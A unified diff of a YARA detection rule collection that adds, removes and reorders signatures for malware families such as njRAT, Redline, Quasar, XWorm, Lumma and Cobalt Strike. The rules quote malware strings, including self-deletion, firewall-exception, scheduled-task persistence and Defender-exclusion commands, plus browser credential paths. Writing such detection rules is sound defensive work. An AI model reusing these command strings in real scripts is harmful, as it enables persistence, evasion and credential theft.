"https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_njrat_strings_oct_2023.yar#L3-L25" license_url = "N/A" - hash = "9877fc613035d533feda6adc6848e183bf8c8660de3a34b1acd73c75e62e2823" - hash = "40f07bdfb74e61fe7d7973bcd4167ffefcff2f8ba2ed6f82e9fcb5a295aaf113" - logic_hash = "0bdbf5715e3873d96c88a24ba08487af2b798d26cdcd3e35d783ce4828dae775" + hash = "59d6e2958780d15131c102a93fefce6e388e81da7dc78d9c230aeb6cab7e3474" + logic_hash = "ed36a991aa2699486f1ef34f4f4d559a3dd351180602f017ad7d868e146c703b" score = 75 quality = 75 tags = "" strings: - $s1 = {03 1F 72 2E ?? 03 1F 73 2E ?? 03 1F 74 2E ?? 03 1F 75 2E ?? 03 1F 76 2E ?? } - $s2 = {0B 14 0C 16 0D 16 13 ?? 16 13 ?? 14} + $s1 = "netsh firewall delete allowedprogram" wide + $s2 = "cmd.exe /c ping 0 -n 2 & del" wide + $s3 = "netsh firewall add allowedprogram" wide + $s4 = "Execute ERROR" wide + $s5 = "Update ERROR" wide + $s6 = "Download ERROR" wide condition: dotnet.is_dotnet and ( all of ($s*)) } -rule EMBEERESEARCH_Win_Stealc_Bytecodes_Oct_2023 +import "pe" + +rule EMBEERESEARCH_Win_Icedid_Snowloader_Bytecodes_Oct_2023 { meta: - description = "Bytecodes present in Stealc decoding routine" + description = "No description has been set in the source file - EmbeeResearch" author = "Matthew @ Embee_Research" - id = "ecac28a0-cd77-5e6a-8af2-59ea62e733bf" + id = "ad5d7bf5-813d-519d-91ae-e6a69fd557df" date = "2023-08-27" - modified = "2023-10-09" + modified = "2023-10-18" reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_stealc_bytecodes_oct_2023.yar#L2-L21" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_icedid_snowloader_bytecodes_oct_2023.yar#L2-L23" license_url = "N/A" - hash = "74ff68245745b9d4cec9ef3c539d8da15295bdc70caa6fdb0632acdd9be4130a" - hash = "9f44a4cbc30e7a05d7eb00b531a9b3a4ada5d49ecf585b48892643a189358526" - logic_hash = "d50f57e32a7f513d92625549fcd139b7fa1e478879283fd61426fcd19d03d296" + hash = "e096de90f65ff83ed0e929b330aa765a8e2322625325fb042775bff1748467cc" + hash = "e87928fcddf13935c91a0b5577e28efd29bb6a5c1d98e5129dec63e231601053" + hash = "82a01607ebdcaa73b9ff201ccb76780ad8de4a99dd3df026dcb71b0f007456ed" + logic_hash = "5baa308ce130cbbe80f94fc127b083f26ae87552910c2bc6f3bae3008cf1aa63" score = 75 quality = 75 tags = "" strings: - $s1 = {8b 4d f0 89 4d f8 8b 45 f8 c1 e0 03 33 d2 b9 06 00 00 00 f7 f1 8b e5 5d c2 04 00} - - condition: - ( all of ($s*)) -} -rule EMBEERESEARCH_Win_Cobalt_Strike_Loader_Shellcode_Jun_2023 : FILE -{ - meta: - description = "Detection of an encoder observed with Cobalt Strike shellcode" - author = "Matthew @ Embee_research" - id = "ea52b9e7-f2bd-5c9f-9ee1-506baa48be84" - date = "2023-07-03" - modified = "2023-07-03" - reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_cobalt_shellcode_encoder_jun_2023.yar#L1-L21" - license_url = "N/A" - logic_hash = "42b4b9ab681f3164168de84e76bcd8161865fa9e5871d70a6de534b23896e4f0" - score = 75 - quality = 75 - tags = "FILE" - vendor = "" - - strings: - $get_enc_offset = {8b 88 c0 00 00 00 8b 90 c4 00 00 00 48 8d b0 c8 00 00 00} - $decode_loop = {ac 83 e1 03 d2 c8 ff c1 aa ff ca 75 f3} - $b64_initial_bytes = "SInISIlMJAiLiMAAAACLkMQAAABIjbDIAAAA" wide ascii + $s_1 = {4c 77 26 07} + $s_2 = {58 a4 53 e5} + $s_3 = {10 e1 8a c3} condition: - (($get_enc_offset and $decode_loop) or $b64_initial_bytes) and filesize <10000KB + ( all of ($s*)) and pe.number_of_exports>20 } rule EMBEERESEARCH_Win_Darkgate_Xllloader_Oct_2023 { @@ -210124,120 +211985,59 @@ rule EMBEERESEARCH_Win_Darkgate_Xllloader_Oct_2023 condition: ( all of ($s*)) } -rule EMBEERESEARCH_Win_Marsstealer_Encryption_Bytecodes +rule EMBEERESEARCH_Win_Redline_Payload_Dec_2023 { meta: - description = "Encryption observed in MarsStealer" + description = "Patterns observed in redline" author = "Matthew @ Embee_Research" - id = "7a66ea9c-966e-5780-8b36-a268904b9c1b" + id = "6208779a-69b2-55b5-9744-987575c00d96" date = "2023-12-24" - modified = "2023-12-24" + modified = "2023-12-29" reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_marsStealer_encryption_bytecodes_dec_2023.yar#L1-L16" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_payload_dec_2023.yar#L1-L16" license_url = "N/A" - hash = "7a391340b6677f74bcf896b5cc16a470543e2a384049df47949038df5e770df1" - logic_hash = "49ffde28c8823c00959ddbaa516fc48c7908b533c8f91608b0e3a645045c9048" + hash = "5790aead07ce0b9b508392b9a2f363ef77055ae16c44231773849c87a1dd15a4" + logic_hash = "d016baa5017120a3037e9cef7fd649228f7be60e511ecbdedf97916f59eec881" score = 75 quality = 75 tags = "" strings: - $s1 = {31 2d 3d 31 73 30 02 39 c0 74 0a 5b 70 61 73 64 6c 30 71 77 69 8d 5b 01 8d 52 01 39 eb 75 03 83 eb 20 39 ca} + $s1 = {16 72 ?? ?? ?? 70 A2 7E ?? ?? ?? 04 17 72 ?? ?? ?? 70 7E ?? ?? ?? 04 16 9A 28 ?? ?? ?? 06 A2 7E ?? ?? ?? 04 18 72 ?? ?? ?? 70 } condition: - $s1 + all of them } -rule EMBEERESEARCH_Win_Remcos_Rat_Unpacked : FILE +import "dotnet" + +rule EMBEERESEARCH_Win_Quasar_Rat_Client : FILE { meta: - description = "Detects strings present in remcos rat Samples." + description = "Detects strings present in Quasar Rat Samples." author = "Matthew @ Embee_Research" - id = "d4282638-592a-5c07-b07b-937e2a7879e4" + id = "7fc0bd6d-e187-51b7-a8b8-68b17271cef8" date = "2023-08-27" modified = "2023-10-18" reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_remcos_rat_unpacked_aug_2023.yar#L2-L32" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_quasar_rat_client_aug_2023.yar#L3-L37" license_url = "N/A" - hash = "ec901217558e77f2f449031a6a1190b1e99b30fa1bb8d8dabc3a99bc69833784" - logic_hash = "c6d1772a5517b104de3022f4bab55d92784d35c3a252a4e0516083d8bd28cad0" + hash = "914d88f295ac2213f37d3f71e6d4383979283d1728079a208f286effb44d840c" + hash = "45a724179ae1d08044c4bafb69c7f9cdb4ed35891dc9cf24aa664d75464ceb6d" + hash = "7e13bcd73232c3f33410aa95f61e1196a2f9ae35e05c1f9c8f251e07077a9dfb" + logic_hash = "efba911780ffb144f277e88ff8ca8f53a90c32a677ccb19ec26e71f974a1b91f" score = 75 quality = 75 tags = "FILE" strings: - $r0 = " ______ " ascii - $r1 = "(_____ \\ " ascii - $r2 = " _____) )_____ ____ ____ ___ ___ " ascii - $r3 = "| __ /| ___ | \\ / ___) _ \\ /___)" ascii - $r4 = "| | \\ \\| ____| | | ( (__| |_| |___ |" ascii - $r5 = "|_| |_|_____)_|_|_|\\____)___/(___/ " ascii - $s1 = "Watchdog module activated" ascii - $s2 = "Remcos restarted by watchdog!" ascii - $s3 = " BreakingSecurity.net" ascii - - condition: - (( all of ($r*)) or ( all of ($s*))) -} -import "dotnet" - -rule EMBEERESEARCH_Win_Exela_Stealer_Simple_Strings_Sep_2023 -{ - meta: - description = "No description has been set in the source file - EmbeeResearch" - author = "Matthew @embee_research" - id = "e63aa1d3-997e-5200-93fc-869c177fe1a8" - date = "2023-09-24" - modified = "2023-09-26" - reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_exela_stealer_simple_strings_sep_2023.yar#L4-L32" - license_url = "N/A" - hash = "bf5d70ca2faf355d86f4b40b58032f21e99c3944b1c5e199b9bb728258a95c1b" - logic_hash = "2312b63fe86fd34eb12f42f079f470eb3af27ef8c199f3620253c828ad28441a" - score = 75 - quality = 75 - tags = "" - - strings: - $s1 = "https://i.instagram.com/api/v1/accounts/current_user/" wide - $s2 = "/create /f /sc onlogon /rl highest /tn \"AutoUpdateCheckerOnLogon\" /tr " wide - $s4 = "https://discord.com/api/webhooks/" wide - $s5 = "Browser : {0} | Name : {1} | Value : {2} | Date created (timestamp) : {3} | Date last used (timestamp) : {4} | Count {5}" wide - $s6 = "Browser : {0} | {1} {2}/{3} {4}" wide - $e1 = "Exela.Program" wide ascii - $e2 = "Exela.Wifi" wide ascii - $e3 = "Exela.Components" wide ascii - $e4 = "Exela Stealer" wide ascii - $e5 = "Exela.exe" wide ascii - - condition: - dotnet.is_dotnet and (( all of ($s*)) or (3 of ($e*))) -} -import "dotnet" - -rule EMBEERESEARCH_Win_Njrat_Bytecodes_Oct_2023 -{ - meta: - description = "" - author = "Matthew @ Embee_Research" - id = "9e39587a-e878-5f99-806f-e9964952f0ac" - date = "2023-10-03" - modified = "2023-10-03" - reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_njrat_bytecodes_oct_2023.yar#L3-L22" - license_url = "N/A" - hash = "59d6e2958780d15131c102a93fefce6e388e81da7dc78d9c230aeb6cab7e3474" - hash = "4c56ade4409add1d78eac3b202a9fbd6afbd71878c31f798026082467ace2628" - hash = "d5a78790a1b388145424327e78f019584466d30d2d450bba832c0128aa3cd274" - logic_hash = "7df39219e2f2da55e461b1536e92ab125d488a048e41daaaa1fb9516be395d10" - score = 75 - quality = 75 - tags = "" - - strings: - $s1 = {14 80 ?? ?? ?? ?? 16 80 ?? ?? ?? ?? 72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 14 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 80 ?? ?? ?? ?? 72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 14 80 ?? ?? ?? ?? 2A } + $s1 = "Quasar Client" ascii wide + $s2 = "Quasar.Client.Properties.Resources" ascii wide + $s3 = "Google\\Chrome\\User Data\\Default\\" wide + $s4 = "\\Mozilla\\Firefox\\Profiles" wide + $s5 = "Yandex\\YandexBrowser\\User Data\\Default\\" wide condition: - dotnet.is_dotnet and $s1 + uint16(0)==0x5a4d and dotnet.is_dotnet and filesize <7000KB and ( for any i in (0..dotnet.number_of_resources-1) : (dotnet.resources[i].name=="Quasar.Client*") or (3 of ($s*))) } rule EMBEERESEARCH_Win_Lumma_Simple_Strings : FILE { @@ -210268,43 +212068,29 @@ rule EMBEERESEARCH_Win_Lumma_Simple_Strings : FILE condition: uint16(0)==0x5a4d and filesize <5000KB and (( all of ($s*)) or ( all of ($o*))) } -rule EMBEERESEARCH_Win_Redline_Updated_Bytecodes_Oct_2023 +rule EMBEERESEARCH_Win_Solarmarker_Stage2_Bytecodes_Dec_2023 { meta: - description = "Configuration related bytecodes in redline .net files" + description = "Patterns observed in Solarmarker stage2 dll" author = "Matthew @ Embee_Research" - id = "1e4470cf-fad3-57e5-8a95-deb97e98dbdc" - date = "2023-10-11" - modified = "2023-10-11" + id = "9aba6cdf-1491-579d-b4a7-fe229272015d" + date = "2023-12-28" + modified = "2023-12-28" reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_bytecodes_oct_2023.yar#L2-L35" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_solarmarker_stage2_bytecodes_dec_2023.yar#L1-L20" license_url = "N/A" - hash = "0cc3a0f8b48ef8d8562b9cdf9c7cfe7f63faf43a5ac6dc6973dc8bf13b6c88cf" - logic_hash = "77273ba3736baf2c197fb8b17de1e22ba8f2380f73f9114f324ef56bfa508654" + hash = "4a3b60496a793ee96a51fecf8690ef8312429a6b54d32f2a4424395c47b47fc8" + hash = "e0b2457491a8c2d50710aa343ad1957a76f83ceaf680165ffa0e287fe18abbd6" + logic_hash = "8e50e5942f0029ffda1d9750f8cc8e004a2512e50b6a14c1619ae0b83477a944" score = 75 quality = 75 tags = "" strings: - $s_1 = { - 20 ?? ?? ?? ?? // ldc.i4 - 2B 00 // br.s - 28 ?? ?? ?? 2B // Call - 80 ?? ?? ?? 04 // stsfld - (20 ?? ?? ?? ?? 2B00 28 ?? ?? ?? 2B | 72 ?? ?? ?? 70) // ldc.i4, br.s, call OR ldstr - 80 ?? ?? ?? 04 // Call - (20 ?? ?? ?? ?? 2B00 28 ?? ?? ?? 2B | 72 ?? ?? ?? 70) // ldc.i4, br.s, call OR ldstr - 80 ?? ?? ?? 04 // Call - 20 ?? ?? ?? ?? // ldc.i4 - 2B00 // br.s - 28 ?? ?? ?? 2B // Call - 80 ?? ?? ?? 04 // stsfld - 2A // ret - } - $s_2 = "mscoree.dll" + $s1 = {6F ?? ?? 00 0A 1F 20 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 09 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 0A 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 0D 2E ?? 02 7B ?? ?? 00 04 02 7B ?? ?? 00 04 6F ?? ?? 00 0A 1F 0A } condition: - $s_1 and $s_2 + $s1 } rule EMBEERESEARCH_Win_Cobaltstrike_Pipe_Strings_Nov_2023 : FILE { @@ -210334,120 +212120,159 @@ rule EMBEERESEARCH_Win_Cobaltstrike_Pipe_Strings_Nov_2023 : FILE condition: ( all of ($s*)) and filesize <500KB } -rule EMBEERESEARCH_Win_Orcus_Rat_Simple_Strings_Dec_2023 +rule EMBEERESEARCH_Win_Stealc_Bytecodes_Oct_2023 { meta: - description = "Strings observed in Orcus RAT" + description = "Bytecodes present in Stealc decoding routine" author = "Matthew @ Embee_Research" - id = "baef6b96-bf94-5363-9186-9761a8055afd" + id = "ecac28a0-cd77-5e6a-8af2-59ea62e733bf" + date = "2023-08-27" + modified = "2023-10-09" + reference = "https://github.com/embee-research/Yara-detection-rules/" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_stealc_bytecodes_oct_2023.yar#L2-L21" + license_url = "N/A" + hash = "74ff68245745b9d4cec9ef3c539d8da15295bdc70caa6fdb0632acdd9be4130a" + hash = "9f44a4cbc30e7a05d7eb00b531a9b3a4ada5d49ecf585b48892643a189358526" + logic_hash = "d50f57e32a7f513d92625549fcd139b7fa1e478879283fd61426fcd19d03d296" + score = 75 + quality = 75 + tags = "" + + strings: + $s1 = {8b 4d f0 89 4d f8 8b 45 f8 c1 e0 03 33 d2 b9 06 00 00 00 f7 f1 8b e5 5d c2 04 00} + + condition: + ( all of ($s*)) +} +rule EMBEERESEARCH_Win_Redline_Loader_Dec_2023 +{ + meta: + description = "Patterns observed in redline loader" + author = "Matthew @ Embee_Research" + id = "59d933a8-8ccd-565f-b379-e0bf6c3d3111" date = "2023-12-24" - modified = "2023-12-24" + modified = "2023-12-29" reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_orcus_rat_simple_strings_dec_2023.yar#L1-L26" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_loader_dec_2023.yar#L1-L20" license_url = "N/A" - hash = "30a2a674d55d7898d304713dd2f69a043d875230ea7ebee22596ba4c640768db" - logic_hash = "2e0a44ec2749e0fc646dfb003a2d32b3fecfa07ece72ca5a65116250d80496b8" + hash = "" + logic_hash = "831c32f9998b97f7ceeb14df73a264a998df5f8800aaa5271755aaaeac070010" score = 75 quality = 75 tags = "" strings: - $s1 = "Orcus is a Remote Administration Tool for Windows. It allows the administrator to make changes to the system remotely." wide - $s2 = "Orcus.Service" wide - $s4 = "costura.orcus" wide - $s5 = "Orcus.Commands" - $s6 = "Orcus.Shared" - $s7 = "Orcus.Utilities" - $s8 = "Orcus.StaticCommands" - $s9 = "Orcus.Plugins" + $s1 = {8b ?? ?? 0c 30 04 31 46 3b f7 7c ?? 5d 5b 5e 83 ?? ?? 75} + $s2 = "WritePrivateProfileStringA" + $s3 = "SetFileShortNameA" + $s4 = "- Attempt to use MSIL code from this assembly during native code initialization" condition: - (5 of them ) + all of them } -import "math" -import "pe" +rule EMBEERESEARCH_Win_Cobalt_Sleep_Encrypt : FILE +{ + meta: + description = "Detects Sleep Encryption Logic Found in Cobalt Strike Deployments" + author = "Matthew @ Embee_Research" + id = "6bd6fbb4-6634-5b51-90f0-f24e48d69043" + date = "2023-08-27" + modified = "2023-10-18" + reference = "https://github.com/embee-research/Yara-detection-rules/" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_cobalt_sleep_encrypt_aug_2023.yar#L1-L55" + license_url = "N/A" + hash = "26b2f12906c3590c8272b80358867944fd86b9f2cc21ee6f76f023db812e5bb1" + logic_hash = "7aa2674ecaaae819c3f26924fa0622df322b1214493f37b1bdf5e00ba5ee98e6" + score = 75 + quality = 75 + tags = "FILE" -rule EMBEERESEARCH_Win_Pikabot_Resource_Entropy_Oct_2023 + strings: + $r1_nokey = {4E 8B 04 08 B8 ?? ?? ?? ?? 41 F7 E3 41 8B C3 C1 EA 02 41 FF C3 6B D2 0D 2B C2 8A 4C 18 18 41 30 0C 38 48 8B 43 10 41 8B FB 4A 3B 7C 08 08} + $r2_nokey = {49 8B F9 4C 8B 03 B8 ?? ?? ?? ?? 41 F7 E1 41 8B C1 C1 EA 02 41 FF C1 6B D2 0D 2B C2 8A 4C 18 18 42 30 0C 07 48 FF C7 45 3B CB} + + condition: + ($r1_nokey or $r2_nokey) +} +rule EMBEERESEARCH_Win_Remcos_Rat_Unpacked : FILE { meta: - description = "Pikabot Loaders embedding encrypted inside of numerous png images" + description = "Detects strings present in remcos rat Samples." author = "Matthew @ Embee_Research" - id = "253d35ae-a325-51c7-8da5-32bb46c51acd" - date = "2023-10-03" - modified = "2023-10-08" + id = "d4282638-592a-5c07-b07b-937e2a7879e4" + date = "2023-08-27" + modified = "2023-10-18" reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_pikabot_resource_entropy_oct_2023.yar#L5-L40" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_remcos_rat_unpacked_aug_2023.yar#L2-L32" license_url = "N/A" - hash = "936247d9a0ce76bed17f03430186abb9ecafa88ef3a968cdd46c5b0a24a5cc3f" - hash = "2c7b7c3ec8a6a835e07c8feed401460e185388f59ea5fc8aa8038d2b75815666" - hash = "00239c55d7135aa06e21ace557a3e8bf3818c2e07051c84753209e7348b6a426" - hash = "5f218eeb83c936d88b65ec3f3052d8c53f58775dacc04bedc91bd388fb7bb885" - hash = "6bea3ecd1f43bdcc261719fb732fcf27e82ed6f4b086616925291a733f358a26" - hash = "966042f3e532b6abce7d96bbdb91dc4561b32a4b0b9eec7b08b4f1024c2da916" - hash = "951c906a1fa179050d30c06849d42e49a295dd1baad91efb244b2e5486b5801d" - hash = "a06bd2623c389f2547d0bf750ca720ab7a74c90982267aad49ba31d5de345288" - hash = "aeb2bf8898636b572b0703d9ddb90b9a4c5c6db9eee631ee726ad753f197ac12" - logic_hash = "7beec034fc927990734691bd6859870921027860c0591c7a0d5a3815f919112d" + hash = "ec901217558e77f2f449031a6a1190b1e99b30fa1bb8d8dabc3a99bc69833784" + logic_hash = "c6d1772a5517b104de3022f4bab55d92784d35c3a252a4e0516083d8bd28cad0" score = 75 - quality = 50 - tags = "" + quality = 75 + tags = "FILE" strings: - $s1 = "ARROW-DOWN" wide - $s2 = "ARROW-LEFT" wide - $s3 = "ARROW-RIGHT" wide + $r0 = " ______ " ascii + $r1 = "(_____ \\ " ascii + $r2 = " _____) )_____ ____ ____ ___ ___ " ascii + $r3 = "| __ /| ___ | \\ / ___) _ \\ /___)" ascii + $r4 = "| | \\ \\| ____| | | ( (__| |_| |___ |" ascii + $r5 = "|_| |_|_____)_|_|_|\\____)___/(___/ " ascii + $s1 = "Watchdog module activated" ascii + $s2 = "Remcos restarted by watchdog!" ascii + $s3 = " BreakingSecurity.net" ascii condition: - pe.DLL and ( all of ($s*)) and pe.number_of_resources>25 and pe.sections[3].raw_data_size>400KB and math.entropy(pe.sections[3].raw_data_offset,pe.sections[3].raw_data_size)>7.5 + (( all of ($r*)) or ( all of ($s*))) } import "dotnet" -rule EMBEERESEARCH_Win_Xworm_Simple_Strings +rule EMBEERESEARCH_Win_Njrat_Bytecodes_V2_Oct_2023 { meta: - description = "Detects simple strings present in unobfuscated xworm" + description = "" author = "Matthew @ Embee_Research" - id = "8d5d8f07-72fa-596b-a3fc-1dee4b7fd058" - date = "2023-08-30" - modified = "2023-10-18" + id = "9090574e-7ad4-5207-af8b-7b56f2a1c917" + date = "2023-10-03" + modified = "2023-10-08" reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_xworm_simple_strings_sep_2023.yar#L3-L29" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_njrat_bytecodes_v2_oct_2023.yar#L5-L27" license_url = "N/A" - hash = "4459d95c0493d640ecc9453cf6a4f2b7538b1a7b95032f70803fc726b8e40422" - hash = "820bb1a31f421b90ea51efc3e71cc720c8c2784fb1e882e732e8fafb8631a389" - logic_hash = "f7df310b24b2078249cdb670ece71ebe30f985c92b3e44b6dcf0e37405a26bc3" + hash = "9877fc613035d533feda6adc6848e183bf8c8660de3a34b1acd73c75e62e2823" + hash = "40f07bdfb74e61fe7d7973bcd4167ffefcff2f8ba2ed6f82e9fcb5a295aaf113" + logic_hash = "0bdbf5715e3873d96c88a24ba08487af2b798d26cdcd3e35d783ce4828dae775" score = 75 quality = 75 tags = "" strings: - $x1 = "XWorm V" wide nocase - $s1 = "/create /f /RL HIGHEST /sc minute /mo 1 /tn " wide - $s2 = "/create /f /sc minute /mo 1 /tn " wide - $s3 = "-ExecutionPolicy Bypass Add-MpPreference -ExclusionPath " wide + $s1 = {03 1F 72 2E ?? 03 1F 73 2E ?? 03 1F 74 2E ?? 03 1F 75 2E ?? 03 1F 76 2E ?? } + $s2 = {0B 14 0C 16 0D 16 13 ?? 16 13 ?? 14} condition: - dotnet.is_dotnet and $x1 and (2 of ($s*)) + dotnet.is_dotnet and ( all of ($s*)) } -rule EMBEERESEARCH_Win_Redline_Payload_Dec_2023 +rule EMBEERESEARCH_Win_Berbew_Strings_Dec_2023 { meta: - description = "Patterns observed in redline" + description = "Strings observed in Berbew malware." author = "Matthew @ Embee_Research" - id = "6208779a-69b2-55b5-9744-987575c00d96" + id = "402711af-c543-5c95-ae9e-e663825b6653" date = "2023-12-24" - modified = "2023-12-29" + modified = "2023-12-26" reference = "https://github.com/embee-research/Yara-detection-rules/" - source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_payload_dec_2023.yar#L1-L16" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_berbew_strings_dec_2023.yar#L1-L19" license_url = "N/A" - hash = "5790aead07ce0b9b508392b9a2f363ef77055ae16c44231773849c87a1dd15a4" - logic_hash = "d016baa5017120a3037e9cef7fd649228f7be60e511ecbdedf97916f59eec881" + hash = "24dc0af3c51118697df999d8bffcdfc9cbf0d07f2630473450dd826a1ae4b9ae" + logic_hash = "a7f687e749ec69961777063d52678461a8e288c80037fac051d7b1a5b568d9e8" score = 75 quality = 75 tags = "" strings: - $s1 = {16 72 ?? ?? ?? 70 A2 7E ?? ?? ?? 04 17 72 ?? ?? ?? 70 7E ?? ?? ?? 04 16 9A 28 ?? ?? ?? 06 A2 7E ?? ?? ?? 04 18 72 ?? ?? ?? 70 } + $s1 = "This KEWL STUFF was coded by V. V. PUPKIN" + $s2 = "REAL CASH, REAL BITCHEZ" + $s3 = "Please, enter your Card Number" condition: all of them @@ -210478,6 +212303,86 @@ rule EMBEERESEARCH_Win_Xworm_Bytestring condition: dotnet.is_dotnet and $p1 } +import "dotnet" + +rule EMBEERESEARCH_Win_Njrat_Bytecodes_Oct_2023 +{ + meta: + description = "" + author = "Matthew @ Embee_Research" + id = "9e39587a-e878-5f99-806f-e9964952f0ac" + date = "2023-10-03" + modified = "2023-10-03" + reference = "https://github.com/embee-research/Yara-detection-rules/" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_njrat_bytecodes_oct_2023.yar#L3-L22" + license_url = "N/A" + hash = "59d6e2958780d15131c102a93fefce6e388e81da7dc78d9c230aeb6cab7e3474" + hash = "4c56ade4409add1d78eac3b202a9fbd6afbd71878c31f798026082467ace2628" + hash = "d5a78790a1b388145424327e78f019584466d30d2d450bba832c0128aa3cd274" + logic_hash = "7df39219e2f2da55e461b1536e92ab125d488a048e41daaaa1fb9516be395d10" + score = 75 + quality = 75 + tags = "" + + strings: + $s1 = {14 80 ?? ?? ?? ?? 16 80 ?? ?? ?? ?? 72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 14 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 80 ?? ?? ?? ?? 72 ?? ?? ?? ?? 80 ?? ?? ?? ?? 14 80 ?? ?? ?? ?? 2A } + + condition: + dotnet.is_dotnet and $s1 +} +rule EMBEERESEARCH_Win_Lumma_Update_Simple_Strings_Sep_2023 : FILE +{ + meta: + description = "" + author = "Matthew @ Embee_Research" + id = "90209fc6-fd50-5b55-a400-112b2f207885" + date = "2023-09-13" + modified = "2023-09-21" + reference = "https://github.com/embee-research/Yara-detection-rules/" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_lumma_updated_sep_2023.yar#L1-L25" + license_url = "N/A" + hash = "898a2bdbbb33ccd63b038c67d217554a668a52e9642874bd0f57e08153e6e5be" + logic_hash = "61571057a5a9c114b6ed5b94b922f2b389406a05e705b3e9e6ddbee221f74c92" + score = 75 + quality = 75 + tags = "FILE" + + strings: + $s1 = "Do you want to run a malware ?" wide + $s2 = "c2sock" wide + $s3 = "TeslaBrowser/5" wide + $s4 = "Crypt build to disable this message" wide + + condition: + uint16(0)==0x5a4d and filesize <5000KB and ( all of ($s*)) +} +import "dotnet" + +rule EMBEERESEARCH_Win_Agent_Tesla_Bytecodes_Sep_2023 +{ + meta: + description = "No description has been set in the source file - EmbeeResearch" + author = "Matthew @embee_research" + id = "9d1c5010-7c64-5a6a-bf60-35c042732761" + date = "2023-09-21" + modified = "2023-09-21" + reference = "https://github.com/embee-research/Yara-detection-rules/" + source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_agent_tesla_bytecodes_sep_2023.yar#L4-L21" + license_url = "N/A" + hash = "ce696cf7a6111f5e7c6781854de04ddc262b6c9b39c059fd5435dfb3b8901f04" + hash = "afc29232c4989587db2c54b7c9f145fd0d73537e045ece15338582ede5389fce" + hash = "fba4374163ba25c9dc572f1a5d7f3e46e09531ab964d808f3dde2a19c05a2ee5" + logic_hash = "1cc40ab16dfa5245b3146e4512509037f540d59e155040a2336a97cd0f42e612" + score = 75 + quality = 75 + tags = "" + + strings: + $s1 = {8F ?? ?? ?? ?? 25 47 FE ?? ?? ?? FE ?? ?? ?? 91 61 D2 52 20 ?? ?? ?? ?? FE ?? ?? ?? } + + condition: + dotnet.is_dotnet and $s1 +} rule EMBEERESEARCH_Win_Ursnif_Patterns_Oct_2022 { meta: @@ -210501,136 +212406,151 @@ rule EMBEERESEARCH_Win_Ursnif_Patterns_Oct_2022 